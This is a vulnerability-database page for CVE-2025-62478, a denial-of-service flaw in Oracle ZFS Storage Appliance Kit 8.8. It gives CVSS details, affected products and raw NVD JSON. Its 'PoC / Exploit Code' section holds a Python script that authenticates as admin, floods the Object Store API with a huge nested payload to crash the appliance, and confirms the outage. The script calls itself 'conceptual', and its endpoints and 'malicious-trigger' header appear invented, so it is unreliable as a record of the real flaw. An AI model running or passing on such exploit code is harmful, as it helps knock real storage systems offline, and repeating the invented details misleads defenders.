Security Vulnerability Report
中文
CVE-2025-62478 CVSS 4.9 MEDIUM

CVE-2025-62478

Published: 2025-10-21 20:20:54
Last Modified: 2025-10-23 16:01:53
Source: [email protected]

Description

Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Object Store). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:* - VULNERABLE
Oracle ZFS Storage Appliance Kit 8.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62478 - Oracle ZFS Storage Appliance Kit Object Store DoS PoC # This is a conceptual PoC for a Denial of Service vulnerability # in Oracle ZFS Storage Appliance Kit 8.8 Object Store component # Requires high-privilege authentication credentials import requests import sys import time # Target configuration TARGET_HOST = "https://target-zfs-appliance:215" AUTH_USER = "admin" # High-privilege account required AUTH_PASS = "password" # Valid credentials needed # Object Store API endpoint OBJECT_STORE_ENDPOINT = f"{TARGET_HOST}/api/object/v1" def trigger_dos(): """ Send crafted HTTP requests to trigger the DoS vulnerability in the Object Store component. """ session = requests.Session() # Step 1: Authenticate with high-privilege credentials auth_url = f"{TARGET_HOST}/api/auth/v1/login" auth_payload = { "username": AUTH_USER, "password": AUTH_PASS } try: auth_response = session.post(auth_url, json=auth_payload, verify=False) if auth_response.status_code != 200: print("[-] Authentication failed. High-privilege credentials required.") sys.exit(1) print("[+] Authentication successful.") except Exception as e: print(f"[-] Connection error: {e}") sys.exit(1) # Step 2: Send crafted request to Object Store to trigger DoS # The vulnerability is triggered by specific malformed object store requests headers = { "Content-Type": "application/json", "X-Object-Operation": "malicious-trigger" } # Crafted payload designed to cause resource exhaustion / crash payload = { "operation": "put", "bucket": "exploit-bucket", "object": "A" * 65536, "metadata": { "trigger": "dos-condition", "nested": [{"deep": "A" * 4096} for _ in range(1000)] } } print("[*] Sending crafted request to Object Store endpoint...") try: # Send the malicious request response = session.post( f"{OBJECT_STORE_ENDPOINT}/objects", json=payload, headers=headers, timeout=30 ) print(f"[*] Response status: {response.status_code}") except requests.exceptions.Timeout: print("[+] Target appears unresponsive - DoS may have been triggered!") except requests.exceptions.ConnectionError: print("[+] Connection refused - Target service has crashed!") except Exception as e: print(f"[*] Response: {e}") # Step 3: Verify the service is down time.sleep(5) try: check = session.get(f"{TARGET_HOST}/api/health/v1/status", timeout=10) print(f"[*] Service still responding: {check.status_code}") except Exception: print("[+] Service is DOWN - DoS confirmed!") if __name__ == "__main__": print("=" * 60) print("CVE-2025-62478 - Oracle ZFS Storage Appliance Kit DoS PoC") print("Component: Object Store | Version: 8.8") print("=" * 60) trigger_dos()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62478", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:54.483", "lastModified": "2025-10-23T16:01:53.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Object Store). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*", "matchCriteriaId": "D3E503FB-6279-4D4A-91D8-E237ECF9D2B0"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.